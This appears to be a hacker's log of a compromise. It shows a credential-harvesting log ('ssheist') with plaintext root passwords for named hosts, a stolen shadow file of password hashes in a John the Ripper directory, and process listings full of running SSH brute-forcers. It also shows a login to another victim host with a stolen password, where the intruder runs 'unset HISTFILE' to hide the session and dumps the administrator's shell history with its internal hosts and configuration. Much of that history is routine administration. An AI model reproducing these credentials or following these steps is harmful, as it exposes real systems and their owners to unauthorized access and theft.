[root@plet ...]# cat ssheist-1.log
===========================================================================
Username: root Password: n3tw0rk1ng Host: lin02.lanlink.co.za
===========================================================================
===========================================================================
Username: root Password: `1q2wsxde Host: lin02.lanlink.co.za
===========================================================================
===========================================================================
Username: root Password: n3tw0rk1ng Host: localhost
===========================================================================
===========================================================================
Username: root Password: n3tw0rk1ng Host: knysna.compumail.co.za
===========================================================================
===========================================================================
Username: root Password: n3tw0rk1ng Host: knysna.compumail.co.za
===========================================================================
===========================================================================
Username: root Password: n3tw0rk1ng Host: sodwana.compumail.co.za
===========================================================================
===========================================================================
Username: root Password: coahtr Host: histologic.no-ip.info
===========================================================================
===========================================================================
Username: root Password: n3tw0rk1ng Host: knysna.compumail.co.za
===========================================================================
===========================================================================
Username: test Password: test Host: 129.7.238.59
===========================================================================
===========================================================================
Username: root Password: n3tw0rk1ng Host: knysna.compumail.co.za
===========================================================================
===========================================================================
Username: root Password: n3tw0rk1ng Host: knysna.compumail.co.za
===========================================================================
[root@plet ...]# cd john-1.6/
[root@plet john-1.6]# cd run
[root@plet run]# ls
128.8.140.206.shadow john.ini restore
all.chr john.pot unafs@
alpha.chr lanman.chr unique@
digits.chr mailer* unshadow@
john* password.lst
[root@plet run]# cat john.pot
[root@plet run]# cat 128.8.140.206.shadow
root:1/CYJWaWszA5M:6445::::::
daemon:NP:6445::::::
bin:NP:6445::::::
sys:NP:6445::::::
adm:NP:6445::::::
lp:NP:6445::::::
uucp:NP:6445::::::
nuucp:NP:6445::::::
listen:*LK*:::::::
nobody:NP:6445::::::
noaccess:NP:6445::::::
nobody4:NP:6445::::::
ravi:3uX7r/uT9F/7I:11404::::::
patrick:eM61oULnSalhY:12175::::::
[root@plet run]#
[root@plet run]# ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 1364 500 ? S May30 0:53 init [3]
root 2 0.0 0.0 0 0 ? SW May30 0:00 [keventd]
root 3 0.0 0.0 0 0 ? SWN May30 0:02 [ksoftirqd_CPU0]
root 4 0.0 0.0 0 0 ? SWN May30 0:02 [ksoftirqd_CPU1]
root 5 0.0 0.0 0 0 ? SW May30 0:19 [kswapd]
root 6 0.0 0.0 0 0 ? SW May30 0:00 [bdflush]
root 7 0.0 0.0 0 0 ? SW May30 7:37 [kupdated]
root 8 0.0 0.0 0 0 ? SW< May30 0:00 [mdrecoveryd]
root 12 0.0 0.0 0 0 ? SW May30 0:00 [scsi_eh_0]
root 13 0.0 0.0 0 0 ? SW May30 0:00 [scsi_eh_1]
root 17 0.0 0.0 0 0 ? SW May30 0:01 [kreiserfsd]
root 133 0.0 0.1 2040 1252 ? S May30 0:02 devfsd /dev
root 235 0.0 0.0 0 0 ? SW May30 0:00 [khubd]
root 965 0.0 0.0 1444 584 ? S May30 20:26 syslogd -m 0
root 973 0.0 0.1 2120 1204 ? S May30 0:04 klogd -2
daemon 2447 0.0 0.0 1392 500 ? S May30 0:00 /usr/sbin/atd
named 2464 0.0 1.1 21584 10664 ? S May30 0:00 named -u named
named 2469 0.0 1.1 21584 10664 ? S May30 0:12 named -u named
named 2470 0.0 1.1 21584 10664 ? S May30 14:31 named -u named
named 2471 0.0 1.1 21584 10664 ? S May30 14:29 named -u named
named 2472 0.0 1.1 21584 10664 ? S May30 0:37 named -u named
named 2473 0.0 1.1 21584 10664 ? S May30 6:00 named -u named
root 2490 0.0 0.1 1784 1776 ? SL May30 0:50 ntpd -A
root 2532 0.0 0.0 2028 880 ? S May30 3:22 xinetd -stayalive
root 2608 0.0 0.2 4860 2024 ? S May30 3:29 sendmail: accepti
mail 2623 0.0 0.1 4852 1480 ? S May30 0:00 sendmail: Queue r
root 2776 0.0 0.2 7760 2472 ? S May30 0:23 httpd-perl -f /et
apache 2780 0.0 0.1 7856 1532 ? S May30 0:00 httpd-perl -f /et
apache 2782 0.0 0.1 7856 1532 ? S May30 0:00 httpd-perl -f /et
apache 2783 0.0 0.1 7856 1532 ? S May30 0:00 httpd-perl -f /et
apache 2785 0.0 0.1 7856 1532 ? S May30 0:00 httpd-perl -f /et
root 2793 0.0 0.4 12524 4140 ? S May30 0:27 httpd -DPERLPROXI
root 2880 0.0 0.0 1568 672 ? S May30 0:03 crond
root 2948 0.0 0.0 1332 408 vc/2 S May30 0:00 /sbin/mingetty tt
root 2949 0.0 0.0 1332 408 vc/3 S May30 0:00 /sbin/mingetty tt
root 2950 0.0 0.0 1332 408 vc/4 S May30 0:00 /sbin/mingetty tt
root 2951 0.0 0.0 1332 408 vc/5 S May30 0:00 /sbin/mingetty tt
root 2952 0.0 0.0 1332 408 vc/6 S May30 0:00 /sbin/mingetty tt
msp_info 5845 0.0 0.2 3624 2072 ? S May30 6:00 ./Contagious Kv1c
root 9155 0.0 0.2 5296 2584 ? S May30 0:00 sendmail: j4U6ftV
root 7600 0.0 0.1 3732 1496 ? S Jun01 0:00 /usr/bin/perl /us
apache 7601 0.0 0.2 12828 2620 ? S Jun01 0:00 httpd -DPERLPROXI
apache 7602 0.0 0.2 12836 2608 ? S Jun01 0:00 httpd -DPERLPROXI
apache 7603 0.0 0.2 12828 2616 ? S Jun01 0:00 httpd -DPERLPROXI
apache 7604 0.0 0.2 12820 2608 ? S Jun01 0:00 httpd -DPERLPROXI
apache 12589 0.0 0.2 12720 2508 ? S Jun01 0:00 httpd -DPERLPROXI
root 1260 0.0 0.1 2328 1072 ? S Jun02 0:00 login -- root
apache 4834 0.0 0.2 12824 2612 ? S Jun02 0:00 httpd -DPERLPROXI
root 14207 0.0 0.0 2632 764 ? S Jun03 0:12 ./sshbrute -brute
root 17152 0.0 0.1 2712 1632 vc/1 S Jun08 0:00 -bash
apache 14863 0.0 0.4 12680 4468 ? S Jun09 0:00 httpd -DPERLPROXI
root 24042 0.0 0.2 5216 2508 ? S Jun10 0:00 sendmail: j5AFH2V
root 25803 0.2 0.0 1648 728 ? S Jun10 10:41 xfsd
root 27645 0.0 0.0 2632 760 ? S Jun10 0:04 ./sshbrute2 -brut
root 27695 0.0 0.0 2632 760 ? S Jun10 0:01 ./sshbrute2 -brut
root 27805 0.0 0.0 2632 764 ? S Jun10 0:00 ./sshbrute -brute
root 26355 0.0 0.0 2632 764 ? S Jun11 0:00 ./sshbrute -brute
root 32265 0.0 0.0 2632 764 ? S Jun12 0:00 ./sshbrute -brute
root 32275 0.0 0.0 2632 760 ? S Jun12 0:00 ./sshbrute2 -brut
root 21234 0.0 0.1 2920 1288 ? S Jun13 0:03 /usr/sbin/sshd
root 14019 0.0 0.1 5604 1556 ? S 00:41 0:00 sshd: root@notty
root 14389 0.0 0.0 1576 696 ? S 00:45 0:00 CROND
root 14391 0.0 0.3 6052 3224 ? S 00:45 0:00 sendmail: ./j5DMj
root 15324 0.0 0.2 5216 2496 ? S 00:57 0:00 sendmail: j5DMvsV
root 17286 0.0 0.1 5608 1576 ? S 01:17 0:00 sshd: root@notty
root 17978 0.0 0.1 5604 1564 ? S 01:25 0:00 sshd: root@pts/4
root 18000 0.0 0.1 2696 1620 pts/4 S 01:25 0:00 -bash
root 18328 0.5 0.1 2800 1268 ? S 01:29 0:01 ./sshbrute -brute
root 18369 0.3 0.1 2796 1296 ? S 01:30 0:00 ./sshbrute -brute
root 18397 0.5 0.1 2796 1296 ? S 01:31 0:00 ./sshbrute -brute
root 18433 0.5 0.1 2796 1296 ? S 01:32 0:00 ./sshbrute2 -brut
root 18436 0.5 0.1 2796 1296 ? S 01:32 0:00 ./sshbrute -brute
root 18459 0.2 0.1 2796 1296 ? S 01:32 0:00 ./sshbrute2 -brut
root 18470 0.2 0.1 2784 1120 ? S 01:33 0:00 ./sshbrute2 -brut
root 18471 0.0 0.1 3172 1320 pts/4 R 01:33 0:00 ps aux
[root@plet run]# logout
----------------------------------
skew @ histologic: nothing much here but more pr00f skew == tal0n.
----------------------------------
login as: root
root@histologic.no-ip.info's password:
Last login: Tue Jun 14 04:51:51 2005 from adsl-10-197-59.mia.bellsouth.net
[root@histofw root]# unset HISTFILE
[root@histofw root]# w
07:01:49 up 200 days, 17:40, 0 users, load average: 0.01, 0.02, 0.00
USER TTY LOGIN@ IDLE JCPU PCPU WHAT
[root@histofw root]# ls -al
total 408
drwx------ 20 root root 4096 Jun 14 05:15 ./
drwxr-xr-x 18 root adm 4096 Nov 25 2004 ../
-rw------- 1 root root 16160 Jun 12 14:42 .bash_history
-rw-r--r-- 1 root root 24 Dec 2 2002 .bash_logout
-rw-r--r-- 1 root root 106 Dec 2 2002 .bash_profile
-rw-r--r-- 1 root root 226 Dec 2 2002 .bashrc
-rw-r--r-- 1 root root 233 Dec 2 2002 .cshrc
-rw-r--r-- 1 root root 14 May 12 2004 .desktop
drwx------ 3 root root 4096 May 12 2004 Desktop/
drwxr-xr-x 2 root root 4096 May 12 2004 Documents/
drwx------ 2 root root 4096 May 12 2004 drakx/
-rw-r--r-- 1 root root 355 May 12 2004 .fonts.cache-1
drwx------ 3 root root 4096 May 12 2004 .gconf/
drwx------ 2 root root 4096 May 12 2004 .gconfd/
drwx------ 2 root root 4096 May 12 2004 .gnome/
drwx------ 3 root root 4096 May 12 2004 .gnome2/
drwx------ 2 root root 4096 May 12 2004 .gnome2_private/
-rw-r--r-- 1 root root 119 May 12 2004 .gtkrc
-rw-r--r-- 1 root root 123 May 12 2004 .gtkrc-2.0
-rw------- 1 root root 0 May 13 2004 .ICEauthority
drwxr-xr-x 2 root root 4096 May 12 2004 .icewm/
drwx------ 2 root root 4096 Jun 12 04:00 .irssi/
drwxr-xr-x 4 root root 4096 May 13 2004 .kde/
drwxr-xr-x 2 root root 4096 Jun 2 2004 .mc/
drwxr-xr-x 2 root root 4096 May 12 2004 .mcop/
drwxrwxr-x 3 500 500 4096 Jun 4 2004 noip-2.1.1/
-rw-r--r-- 1 root root 71210 Jun 4 2004 noip-duc-linux.tar.gz
drwxr-xr-x 2 root root 4096 May 12 2004 .qt/
-rw------- 1 root root 1024 May 13 2004 .rnd
-rw-r--r-- 1 root root 126 May 13 2004 .rpmdrake
drwxr-xr-x 5 root root 4096 May 13 2004 sarg-1.4.1/
-rw-r--r-- 1 root root 2034 May 13 2004 sarg-1.4.1-index.sort.patch
-rw-r--r-- 1 root root 125589 May 13 2004 sarg-1.4.1.tar.gz
-rw-r--r-- 1 root root 329 May 13 2004 sarg_cron.txt
-rw-r--r-- 1 root root 177 May 13 2004 sarg_daily.txt
-rw-r--r-- 1 root root 612 May 13 2004 sarg_monthly.htm
-rw-r--r-- 1 root root 292 May 13 2004 sarg_monthly.txt
-rw-r--r-- 1 root root 8368 May 13 2004 sarg.reports.txt
-rw-r--r-- 1 root root 435 May 13 2004 sarg_weekly.txt
drwx------ 2 root root 4096 May 12 2004 .ssh/
-rw-r--r-- 1 root root 189 Dec 2 2002 .tcshrc
drwx------ 4 root root 4096 Jun 14 05:14 tmp/
-rw------- 1 root root 5624 Jun 14 05:15 .viminfo
-rw-r--r-- 1 root root 3750 Dec 2 2002 .vimrc
-rw-r--r-- 1 root root 6 May 12 2004 .wmrc
-rw------- 1 root root 53 May 13 2004 .Xauthority
-rw-r--r-- 1 root root 1479 Dec 2 2002 .Xdefaults
-rw------- 1 root root 1478 May 13 2004 .xsession-errors
[root@histofw root]# history
5 cd /etc/squid/
6 ll
7 vi squid.conf
8 vi msntauth.conf
9 dig server1
10 cd /etc/hosts
11 cd /etc
12 vi hosta
13 vi hosts
14 dig server1
15 vi hosts
16 /usr/lib/squid/msnt_auth
17 dmesg
18 scp root@knysna.compumail.co.za:/usr/sbin/bwm /usr/sbin/
19 scp root@knysna.compumail.co.za:/usr/bin/bwm /usr/sbin/
20 scp root@knysna.compumail.co.za:/usr/bin/bwm /usr/bin/
21 ll
22 dmesg -c
23 vi msntauth.conf
24 /usr/lib/squid/msnt_auth
25 ping 192.168.0.1
26 ping server1
27 cd squid/
28 vi msntauth.conf
29 /usr/lib/squid/msnt_auth
30 locate msnt_auth
31 cd /usr/lib/squid/
32 ll
33 cd et
34 cd ..
35 ll
36 cd squid/
37 ll
38 file msnt_auth
39 view msnt_auth
40 vi /etc/squid/msntauth.conf
41 pwd
42 ./msnt_auth
43 ./msnt_auth -d
44 /etc/init.d/squid restart
45 cd /etc/squid/
46 vi squid.conf
47 squid check
48 squid -k check
49 squid -k restart
50 /etc/init.d/squid restart
51 tail -f /var/log/squid/access.log
52 ll
53 cd /
54 cd /root/
55 ll
56 tar zcvf sarg-1.4.1.tar.gz
57 tar zxvf sarg-1.4.1.tar.gz
58 cd sarg
59 cd sarg-1.4.1
60 ll
61 ll ..
62 cd ..
63 tar zxvf sarg-1.4.1-index.sort.patch.gz
64 gunzip sarg-1.4.1-index.sort.patch.gz
65 ll
66 cd sarg-1.4.1
67 patch -?
68 patch --help
69 cd ..
70 ll
71 view sarg-1.4.1-index.sort.patch
72 cd sarg
73 cd sarg-1.4.1
74 patch -c0 < ../sarg-1.4.1-index.sort.patch
75 man patch
76 patch -p0 < ../sarg-1.4.1-index.sort.patch
77 ll
78 ./configure
79 make
80 make install
81 vi Makefile
82 locate man
83 locate man | more
84 vi Makefile
85 locate man | more
86 vi Makefile
87 make install
88 cd /etc/shorewall/
89 vi rules
90 shorewall restart
91 vi rules
92 shorewall restart
93 cat /var/named/office.histologic.co.za.hosts
94 dig server1
95 dig server1.office.histologic.co.za
96 dig server2.office.histologic.co.za
97 vi /etc/nsswitch.conf
98 vi /etc/resolv.conf
99 dig server2.office.histologic.co.za
100 dig www.google.com
101 exit
102 ifconfig
103 ping 196.25.1.1
104 /etc/init.d/iplog status
105 /etc/init.d/iplog restart
106 /etc/init.d/squid status
107 /etc/init.d/squid stop
108 squid -z
109 /etc/init.d/squid start
110 /etc/init.d/squid status
111 tcpdump -i eth1
112 tcpdump -vi eth1
113 tcpdump -vni eth1
114 host 196.37.145.26
115 ssh 196.7.8.54
116 dig -x 165.165.160.224 @196.25.1.1
117 dmesg
118 dmesg -c
119 netstat -rn
120 vi /etc/sysconfig/network
121 /etc/init.d/network restart
122 netstat -rn
123 dmesg -c
124 tcpdump -i eth0 icmp
125 tcpdump -i eth1 icmp
126 vi /etc/shorewall/
127 netstat -rn
128 tcpdump -i eth1 icmp
129 cd /etc/shorewall/
130 vi rules
131 shorewall restart
132 dmesg -c
133 dmesg
134 vi /etc/shorewall/rules
135 tcpdump -i eth0 src 192.168.0.10 and dst 192.168.0.1
136 vi /etc/iplog.conf
137 chkconfig --add iplog
138 /etc/init.d/iplog start
139 tail -f /var/log/iplog
140 dig -x 165.165.179.224
141 dig -x 165.165.179.224 @196.25.1.1
142 dig -x 165.165.179.224 @196.168.10.1
143 dig -x 165.165.179.224 @196.168.1.10
144 tail -f /var/log/iplog
145 cd /etc/shorewall/
146 vi rules
147 vi policy
148 shorewall restart
149 exit
150 vi /usr/sbin/sarg.reports
151 exit
152 /etc/init.d/squid status
153 ping 196.25.1.1
154 dig www.google.com
155 dmesg
156 dmesg -c
157 dig www.google.com
158 dmesg -c
159 ping 196.25.1.1
160 ifconfig
161 ping 192.168.1.10
162 dmesg -c
163 vi /etc/shorewall/rules
164 dmesg
165 dmesg -c
166 vi /etc/shorewall/rules
167 shorewall restart
168 vi /etc/shorewall/rules
169 cd /
170 sarg.reports
171 crontab -e -u root
172 cd /var/www/
173 ll
174 rm -rf www/
175 cd html/squid/
176 ll
177 ll Daily/
178 df -g
179 df -h
180 exit
181 bwm
182 dmesg -c
183 exit
184 /etc/init.d/fwlogwatch status
185 vi /etc/fwlogwatch.config
186 /etc/init.d/fwlogwatch stop
187 fwlogwatch
188 /etc/init.d/fwlogwatch status
189 /etc/init.d/fwlogwatch
190 /etc/init.d/fwlogwatch restart
191 killall fwlogwatch
192 /etc/init.d/fwlogwatch restart
193 vi /etc/fwlogwatch.config
194 /etc/init.d/fwlogwatch start
195 /etc/init.d/fwlogwatch restart
196 /etc/init.d/fwlogwatch stop
197 tail /var/log/messages
198 vi /etc/fwlogwatch.config
199 /etc/init.d/fwlogwatch restart
200 fwlogwatch
201 /etc/init.d/fwlogwatch restart
202 exit
203 cd /var/www/html/
204 ll fwlog.html
205 vi /etc/fwlogwatch.config
206 tail -f /var/log/messages
207 vi /etc/fwlogwatch.config
208 exit
209 /etc/init.d/adsl restart
210 dir
211 /etc/init.d/adsl
212 ifconfig
213 netstat -rn
214 ping 198.168.1.10
215 etc/intit.d/network restart
216 /etc/init.d/network restart
217 ping 192.168.1.10
218 exit
219 /etc/init.d/adsl restart
220 exit
221 ping 196.15.249.203
222 shorewall status
223 /etc/init.d/squid status
224 /etc/init.d/squid stop
225 /etc/init.d/squid start
226 cledar
227 clea
228 clear
229 cd /etc/squid/
230 ls
231 vi msntauth.conf
232 cd /home/
233 ls
234 cd /etc/squid/
235 vi squid.conf
236 cd /usr/lib/squid/
237 ls
238 vi msnt_auth
239 ls
240 /etc/init.d/squid stop
241 ls
242 vi msnt_auth
243 tail -f /var/log/messages
244 route
245 ping 192.168.1.10
246 /etc/init.d/squid start
247 tail -f /var/log/messages
248 poweroff
249 dmesg
250 clear
251 top
252 dmesg
253 clear
254 /etc/init.d/squid status
255 shorewall status
256 dmes
257 dmesg
258 exit
259 bwm
260 cd /etc/squid/
261 ls
262 locate
263 locate access.log
264 cd /var/log/squid
265 ls
266 ls -l
267 bwm
268 ls
269 mv access.log access.log.0206
270 vi access.log
271 ls
272 vi access.log
273 ls
274 vi access.log
275 ls
276 mc
277 mv cache.log cache.log.0206
278 vi cache.log
279 ls
280 mc
281 ls
282 bwm
283 bwm
284 ifconfig
285 tcpdump -ni eth1
286 /etc/init.d/squid stop
287 ls
288 /etc/init.d/squid start
289 /etc/init.d/squid status
290 tail -f /var/log/messages
291 netconf
292 drakconnect
293 /etc/init.d/named status
294 ifconfig
295 drakconnect
296 ifconfig
297 /etc/init.d/network stop
298 ls
299 ping www.mweb.co.za
300 ping knysna.compumail.co.za
301 ipconfig
302 ifconfig
303 ping 192.168.1.2
304 ping 192.168.1.10
305 cd /etc/
306 http://
307 ls
308 vi resolv.conf
309 /etc/init.d/named stop
310 /etc/init.d/named start
311 exit
312 ping plet.compumail.co.za
313 tcpdump -ni eth0
314 tcpdump -ni eth1
315 tcpdump -niv eth1
316 tcpdump -v eth1
317 tcpdump -vi eth1
318 exit
319 ping www.mweb.co.za
320 dmesg -c
321 clear
322 dmesg -c
323 dmesg
324 clear
325 dmesg
326 cd /etc/shorewall/
327 vi rules
328 /etc/init.d/squid stop
329 dmesg
330 dmesg -c
331 clear
332 dmesg -c
333 dmesg
334 clear
335 dmesg
336 tcpdump -ni eth1
337 bwm
338 clear
339 dmesg
340 /etc/init.d/squid start
341 tail -f /var/log/messages
342 vi rules
343 shorewall check
344 shorewall restart
345 exit
346 cd /etc/shorewall/
347 vi rules
348 shorewall check
349 shorewall restart
350 ping www.mweb.co.za
351 ping knysna.compumail.co.za
352 ping www.saix.net
353 exit
354 ssh knysna.compumail.co.za
355 cd /etc/shorewall/
356 cat rules
357 dmesg
358 clear
359 dmesg
360 ping pop.worldonline.co.za
361 cd /etc/
362 vi services
363 vi shorewall/rules
364 dmesg
365 bwm
366 dmesg
367 cd /etc/shorewall/
368 exit
369 bwm
370 dmesg
371 dmesg -c
372 cd /var/log/messages
373 cd /var/log/
374 tail messages
375 tail syslog
376 tail squid/access.log
377 vi /etc/resolv.conf
378 ifconfig
379 vi /etc/resolv.conf
380 dig www.google.com
381 dig www.lanlink.co.za
382 ifconfig
383 ping 196.25.1.1
384 ping
385 dmesg
386 vi /etc/shorewall/rules
387 vi /etc/shorewall/interfaces
388 ifconfig
389 ping
390 dmesg
391 nmap -sP 192.168.1.0/24
392 ping 192.168.1.2
393 netstat -rn
394 ping 192.168.1.10
395 dmesg
396 vi /etc/shorewall/masq
397 ifconfig
398 vi /etc/shorewall/masq
399 shorewall restart
400 vi /etc/shorewall/masq
401 vi /etc/shorewall/rules
402 shorewall restart
403 ifconfig
404 dig thatcher.no-ip.info
405 vi /etc/shorewall/rules
406 ssh 196.15.249.203
407 dmesg
408 ifconfig
409 tcpdump -i eth0
410 tcpdump -i eth0 not tcp port 22
411 tcpdump -vvi eth0 not tcp port 22
412 tcpdump -vi eth0 not tcp port 22
413 tcpdump -vi eth0 not tcp port 22 and not tcp port 110
414 tcpdump -i eth0 not tcp port 22 and not tcp port 110
415 tcpdump -ni eth0 not tcp port 22 and not tcp port 110
416 tcpdump -ni eth1 not tcp port 22 and not tcp port 110
417 tcpdump -ni eth1 dst 196.22.164.106
418 tcpdump -ni eth1 not tcp port 22 and not tcp port 110
419 dmesg -c
420 vi /etc/shorewall/rules
421 shorewall restart
422 dmesg -c
423 vi /etc/shorewall/rules
424 shorewall restart
425 dmesg -c
426 exit
427 bwm
428 dmesg
429 dmesg -c
430 dmesg
431 wget
432 lynx
433 lynx www.no-ip.com/client/linux/noip-duc-linux.tar.gz
434 tar zxvf noip-duc-linux.tar.gz
435 cd noip-2.1.1/
436 ll
437 make
438 make install
439 cd /
440 noip2 -C
441 ps -ef
442 ps -ef | grep noip
443 noip2 -?
444 noip2
445 ps -ef | grep noip
446 ifconfig
447 dmesg
448 dmesg -c
449 noip2
450 noip2 -?
451 dmesg -c
452 bwm
453 exit
454 /etc/init.d/named status
455 /etc/init.d/named
456 exit
457 cd noip-2.1.1/
458 ll
459 vi README.FIRST
460 cd /etc/init.d/
461 vi noip2
462 chkconfig
463 chkconfig --add noip2
464 ll
465 chmod +x noip2
466 chkconfig --add noip2
467 ll ..
468 ll
469 cd ..
470 cd rc.d
471 ll
472 cat rc
473 cd ..
474 man chkconfig
475 vi /root/noip-2.1.1/README.FIRST
476 grep initdefault /etc/inittab | awk -F: '{print $2}'
477 ln
478 ln --help
479 ln /etc/rc3.d/S99noip2 /etc/init.d/noip2
480 ln /etc/init.d/noip2 /etc/rc3.d/S99noip2
481 ln /etc/init.d/noip2 /etc/rc0.d/K20noip
482 chkconfig --list | grep on
483 chkconfig --del webmin
484 locate webmin | more
485 exit
486 cd /etc/
487 vi named.boot named.conf rndc.conf rndc.key
488 exit
489 cd /
490 tar zcvf thatcher.tgz etc/ var/named/
491 dig fw.singita.co.za
492 dig -x 196.7.8.54
493 dig -x 196.7.8.57
494 dig mx singita.co.za
495 tar zcvf thatcher.tgz etc/ var/named/ var/www/
496 cd /etc/init.d/
497 ln /etc/init.d/noip2 /etc/rc.d/rc0.d/K90noip2
498 ln /etc/init.d/noip2 /etc/rc.d/rc1.d/K90noip2
499 ln /etc/init.d/noip2 /etc/rc.d/rc2.d/S10noip2
500 ln /etc/init.d/noip2 /etc/rc.d/rc3.d/S90noip2
501 ln /etc/init.d/noip2 /etc/rc.d/rc2.d/K25noip2
502 rm /etc/rc.d/rc2.d/S10noip2
503 ln /etc/init.d/noip2 /etc/rc.d/rc4.d/S90noip2
504 ln /etc/init.d/noip2 /etc/rc.d/rc5.d/S90noip2
505 ln /etc/init.d/noip2 /etc/rc.d/rc6.d/K08noip2
506 ll
507 cd /
508 tar zcvf thatcher.tgz etc/ var/named/ var/www/
509 cd /etc/init.d/
510 exit
511 usname -u
512 uname -a
513 exit
514 /etc/init.d/squid status
515 exit
516 ifconfig
517 route
518 ping www.mweb.co.za
519 reboot
520 dmesg
521 dmesg -c
522 clear
523 dmesg -c
524 dmesg
525 ping www.mweb.co.za
526 dmesg
527 ping www.mweb.co.za
528 ping www.google.com
529 ping knysna.compumail.co.za
530 exit
531 top
532 clear
533 cd /var/log/squid
534 ls
535 ls -l
536 ls
537 ls -l
538 exit
539 dmesg
540 top
541 exit
542 dnsconf
543 netconf
544 drakconnect
545 exit
546 dmesg
547 ping www.mweb.co.za
548 /etc/init.d/named status
549 cd /etc/
550 vi named.conf
551 ping pop.woroldonline.co.za
552 ping pop.worldonline.co.za
553 telnet pop.worldonline.co.za 110
554 exit
555 dmesg
556 clear
557 dmesg
558 cd /etc/shorewall/
559 vi rules
560 dmesg
561 vi rules
562 shorewall check
563 shorewall restart
564 vi rules
565 exit
566 /etc/init.d/squid restart
567 dmesg -c
568 bwm
569 man lsd
570 lsd
571 lsof
572 man lsof
573 lsof | more
574 chkconfig --list | grep om
575 chkconfig --list | grep on
576 chkconfig --del numlock
577 chkconfig --del xfs
578 l
579 cd ..
580 ls of | more
581 lsof | more
582 man deffsd
583 man dvffsd
584 man devfsd
585 /etc/init.d/devfsd stop
586 lsof | more
587
588 /etc/init.d/xfs stop
589 exit
590 /etc/init.d/adsl
591 exit
592 dir
593 chdir /etc/init.d/adsl
594 help command
595 help dir
596 dir -l
597 help dir
598 dir -v
599 exit
600 lynx www.google.com
601 vi /etc/squid/squid.conf
602 auth_param basic program /usr/lib/squid/msnt_auth
603 /usr/lib/squid/msnt_auth
604 ls /usr/lib/squid/msnt_auth
605 ll /usr/lib/squid/msnt_auth
606 vi /etc/squid/msntauth.conf
607 cat /etc/hosts
608 ping server1
609 /usr/lib/squid/msnt_auth
610 dmesg -c
611 /usr/lib/squid/msnt_auth
612 dmesg -c
613 lsof | more
614 cd /usr/lib/squid/
615 ll
616 ls
617 ls ms*
618 ./msnt_auth
619 dmesg -c
620 reboot
621 exit
622 /etc/init.d/squid restart
623 vi /etc/squid/squid.conf
624 /usr/lib/squid/msnt_auth
625 /usr/lib/squid/msnt_auth -d
626 /usr/lib/squid/msnt_auth -D
627 vi /etc/squid/msntauth.conf
628 /usr/lib/squid/msnt_auth
629 dmesg
630 vi /etc/squid/msntauth.conf
631 /usr/lib/squid/msnt_auth
632 dig server1
633 ping server1
634 ping server2
635 vi /etc/squid/msntauth.conf
636 ssh 196.25.45.214
637 /usr/lib/squid/msnt_auth
638 exit
639 ifconfig
640 ping 196.25.1.1
641 netstat -rn
642 vi /etc/sysconfig/network
643 ifconfig
644 vi /etc/sysconfig/network
645 /etc/init.d/network restart
646 vi /etc/sysctl.conf
647 /etc/init.d/network restart
648 ping 196.25.1.1
649 netstat -rn
650 ping 192.168.1.1
651 lynx 192.168.1.1
652 ifconfig
653 lynx 192.168.1.10
654 ping 192.168.1.10
655 vi /etc/sysconfig/network
656 /etc/init.d/network restart
657 ping 196.25.1.1
658 lsof | grep no
659 chkconfig --list
660 chkconfig --list | grep on
661 ping www.google.com
662 ifconfig
663 lsof | grep squid
664 /etc/init.d/squid status
665 squid -z
666 squid -k check
667 /etc/init.d/squid start
668 squid -k check
669 /etc/init.d/squid start
670 /etc/init.d/squid restart
671 tail -f /var/log/squid/cache.log
672 tail -f /var/log/messages
673 /etc/init.d/squid stop
674 ps -ef | grep squid
675 dig server2
676 vi /etc/hosts
677 hostname
678 hostname -?
679 hostname -d office.histologic.co.za
680 hostname -d histofw.office.histologic.co.za
681 hostname histofw.office.histologic.co.za
682 hostname
683 vi /etc/hosts
684 cd /etc/
685 grep -r office.histologic.co.za * | more
686 vi resolv.conf
687 vi /etc/sysconfig/network
688 grep -r office.histologic.co.za[D * | more
689 grep -r "office.histologic.co.za[D" * | more
690 grep -r "office.histologic.co.za\[D" * | more
691 tail -f /var/log/squid/access.log
692 tail -f /var/log/messages
693 cat /etc/hosts
694 vi /etc/hosts
695 exit
696 cd /etc/rc.d/init.d/
697 ll noip2
698 vi noip2
699 exit
700 vi /etc/shorewall/rules
701 vi /etc/squid/squid.conf
702 squid -k reconfigure
703 exit
704 /etc/init.d/squid restart
705 dmesg -c
706 vi /etc/squid/squid.conf
707 squid -k reconfigure
708 dmesg -c
709 cd /etc/squid/
710 vi msntauth.conf
711 vi /etc/hosts
712 squid -k reconfigure
713 /usr/lib/squid/msnt_auth
714 vi /etc/squid/
715 cat msntauth.conf
716 ping server1
717 ping server2
718 vi /etc/hosts
719 /usr/lib/squid/msnt_auth
720 tail -f /var/log/messages
721 /usr/lib/squid/msnt_auth
722 tail -f /var/log/messages
723 vi /etc/squid/msntauth.conf
724 cat server1 /etc/hosts
725 vi /etc/squid/msntauth.conf
726 cat server1 /etc/hosts
727 vi /etc/hosts
728 vi /etc/squid/msntauth.conf
729 dmesg -c
730 /usr/lib/squid/msnt_auth
731 /etc/init.d/squid stop
732 /usr/lib/squid/msnt_auth
733 exit
734 reboot
735 cd /var/named/
736 ll
737 vi /etc/named.conf
738 dig www.google.com
739 vi /etc/named.conf
740 ifconfig
741 netstat -rn
742 vi /etc/named.conf
743 /etc/init.d/named restart
744 ifconfig
745 /etc/init.d/named restart
746 ll
747 ifconfig /usr/lib/squid/msnt_auth
748 /usr/lib/squid/msnt_auth
749 /etc/init.d/squid restart
750 ext
751 exit
752 dmesg -c
753 cd /var/named/
754 ll
755 rm office.histologic.co.za.hosts
756 rndc reload
757 ll
758 /etc/init.d/named restart
759 ll
760 /etc/init.d/squid stop
761 /usr/lib/squid/msnt_auth
762 ll
763 rndc -?
764 rndc reload
765 ll
766 cat /etc/named.conf
767 rndc reload office.histologic.co.za
768 ll
769 tail -f /var/log/messages
770 vi /etc/named.conf
771 /etc/init.d/named restart
772 vi /etc/hosts
773 vi /etc/squid/squid.conf
774 cd /etc/squid/
775 ll /var/named/
776 rndc reload office.histologic.co.za
777 ssh 196.15.249.214
778 dmesg -c
779 vi /etc/sysctl.conf
780 exit
781 dmesg -c
782 cd /etc/
783 vi named.conf
784 ifconfig
785 vi named.conf
786 rmdc reload
787 rndc reload
788 /etc/init.d/named restart
789 vi /etc/shorewall/rules
790 shorewall restart
791 dmesg -c
792 tcpdump -i eth0
793 tcpdump -i eth0 not tcp port 22
794 dmesg -x
795 dmesg -c
796 dig plet.compumail.co.za
797 telnet plet.compumail.co.za 110
798 exit
799 traceroute -n 196.15.249.203
800 exit
801 passwd
802 exit
803 dir
804 exit
805 dir
806 exit
807 cd /etc/squid/
808 vi msntauth.conf
809 exit
810 cd /etc/shorewall/
811 vi rules
812 vi interfaces
813 ifconfig
814 vi interfaces
